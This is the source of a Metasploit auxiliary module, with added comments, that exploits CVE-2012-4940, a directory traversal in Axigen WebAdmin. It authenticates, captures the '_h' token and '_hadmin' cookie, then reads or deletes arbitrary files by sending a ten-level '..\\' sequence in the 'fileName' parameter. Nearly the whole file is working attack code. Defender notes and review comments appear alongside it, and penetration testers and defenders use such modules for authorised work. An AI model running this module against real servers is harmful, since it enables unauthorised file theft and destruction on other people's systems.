GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/axigen_file_access.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
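# Auxiliary module for CVE-2012-4940: a directory traversal in the Axigen
# WebAdmin interface through which an authenticated user can read or delete
# files outside the log directory (the description states this happens with
# SYSTEM privileges on Windows).
#
# Flow, as implemented below:
#   1. login        - POSTs USERNAME/PASSWORD, then captures the `_h` token
#                     from the redirect and the `_hadmin` session cookie.
#   2. get_platform - fetches the WebAdmin page and looks for the strings
#                     "Windows" or "Linux" in the body.
#   3. read_file / delete_file - send the traversal string plus PATH in the
#                     `fileName` query parameter.
#
# Defender notes: both actions are authenticated GET requests whose
# `fileName` parameter starts with a run of `..\` sequences. Read goes to
# `sources/logging/page_log_file_content.hsp`; Delete goes to the WebAdmin
# root with `page=vlf` and `action=delete`. Where requests to the WebAdmin
# port are logged, parent-directory sequences in `fileName` are the indicator
# to look for. Exposure depends on who can reach and log in to WebAdmin, so
# restricting that interface to management hosts and applying the vendor fix
# for CVE-2012-4940 are the relevant mitigations.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, the Read/Delete actions and the user options.
  #
  # @param info [Hash] metadata overrides passed in by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Axigen Arbitrary File Read and Delete',
        'Description' => %q{
          This module exploits a directory traversal vulnerability in the WebAdmin
          interface of Axigen, which allows an authenticated user to read and delete
          arbitrary files with SYSTEM privileges. The vulnerability is known to work on
          Windows platforms. This module has been tested successfully on Axigen 8.10 over
          Windows 2003 SP2.
        },
        'Author' => [
          'Zhao Liang', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'US-CERT-VU', '586556' ],
          [ 'CVE', '2012-4940' ],
          [ 'OSVDB', '86802' ]
        ],
        'Actions' => [
          ['Read', { 'Description' => 'Read remote file' }],
          ['Delete', { 'Description' => 'Delete remote file' }]
        ],
        'DefaultAction' => 'Read',
        'DisclosureDate' => '2012-10-31'
      )
    )

    register_options(
      [
        Opt::RPORT(9000),
        # NOTE(review): DEPTH is registered but never read anywhere in this
        # class; #run always uses a fixed ten-level traversal. Either wire it
        # in or drop the option so the UI does not advertise a no-op.
        OptInt.new('DEPTH', [ true, 'Traversal depth if absolute is set to false', 4 ]),
        OptString.new('TARGETURI', [ true, 'Path to Axigen WebAdmin', '/' ]),
        OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
        OptString.new('PATH', [ true, 'The file to read or delete', '\\windows\\win.ini' ])
      ]
    )
  end

  # Entry point: authenticates, checks the reported platform, then dispatches
  # to the selected action. Stops early when login fails or the target does
  # not report Windows.
  #
  # @return [void]
  def run
    print_status('Trying to login')
    unless login
      print_error('Login failed, review USERNAME and PASSWORD options')
      return
    end
    print_good('Login Successful')

    @platform = get_platform
    unless @platform == 'windows'
      print_error('*nix platform detected, vulnerability is only known to work on Windows')
      return
    end

    # Ten parent-directory hops using Windows separators.
    @traversal = '..\\' * 10

    # Work on a converted copy. The original called gsub! on the string
    # returned by the datastore and then re-read datastore['PATH'], which
    # both rewrote the user's option value and only worked if the datastore
    # hands back the very same String object on every lookup.
    file = datastore['PATH'].gsub(%r{/}, '\\')

    case action.name
    when 'Read'
      read_file(file)
    when 'Delete'
      delete_file(file)
    end
  end

  # Requests the log-file viewer page with the traversal path and stores a
  # non-empty 200 response as loot.
  #
  # @param file [String] path appended to the traversal prefix
  # @return [void]
  def read_file(file)
    print_status('Retrieving file contents...')

    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, 'sources', 'logging', 'page_log_file_content.hsp'),
        'method' => 'GET',
        'cookie' => "_hadmin=#{@session}",
        'vars_get' => {
          '_h' => @token,
          'fileName' => "#{@traversal}#{file}"
        }
      }
    )

    # Success requires a 200, a Content-Type header and a non-empty body; the
    # body itself is not inspected further.
    if res && (res.code == 200) && res.headers['Content-Type'] && !res.body.empty?
      store_path = store_loot('axigen.webadmin.data', 'application/octet-stream', rhost, res.body, file)
      print_good("File successfully retrieved and saved on #{store_path}")
    else
      print_error('Failed to retrieve file')
    end
  end

  # Sends the log-file delete request (`page=vlf`, `action=delete`) with the
  # traversal path. This action changes state on the target.
  #
  # @param file [String] path appended to the traversal prefix
  # @return [void]
  def delete_file(file)
    print_status("Deleting file #{file}")

    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path),
        'method' => 'GET',
        'cookie' => "_hadmin=#{@session}",
        'vars_get' => {
          '_h' => @token,
          'page' => 'vlf',
          'action' => 'delete',
          'fileName' => "#{@traversal}#{file}"
        }
      }
    )

    # NOTE(review): success is inferred from the "View Log Files" page being
    # returned; the code does not confirm that the file is actually gone.
    if res && (res.code == 200) && res.body =~ (/View Log Files/)
      print_good("File #{file} deleted")
    else
      print_error("Error deleting file #{file}")
    end
  end

  # Fetches the authenticated WebAdmin page and guesses the host platform
  # from the words "Windows" or "Linux" in the response body.
  #
  # @return [String] 'windows' or 'unix'; 'unix' is also the fallback when no
  #   response arrives or neither word is present
  def get_platform
    print_status('Retrieving platform')

    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path),
        'method' => 'GET',
        'cookie' => "_hadmin=#{@session}",
        'vars_get' => {
          '_h' => @token
        }
      }
    )

    if res && (res.code == 200)
      if res.body =~ /Windows/
        print_good('Windows platform found')
        return 'windows'
      elsif res.body =~ /Linux/
        print_good('Linux platform found')
        return 'unix'
      end
    end

    print_warning('Platform not found, assuming UNIX flavor')
    'unix'
  end

  # Posts the credentials to WebAdmin and, on a 303 redirect, stores the
  # `_h` value from the Location header in @token and the `_hadmin` cookie
  # value in @session.
  #
  # @return [Boolean] true only when both the token and the cookie matched
  def login
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path),
        'method' => 'POST',
        'vars_post' => {
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD'],
          'submit' => 'Login',
          'action' => 'login'
        }
      }
    )

    # Both patterns accept lowercase hex only and, because of `*`, would also
    # match an empty value.
    if res && (res.code == 303) && res.headers['Location'] =~ (/_h=([a-f0-9]*)/)
      @token = ::Regexp.last_match(1)
      if res.get_cookies =~ /_hadmin=([a-f0-9]*)/
        @session = ::Regexp.last_match(1)
        return true
      end
    end

    false
  end
end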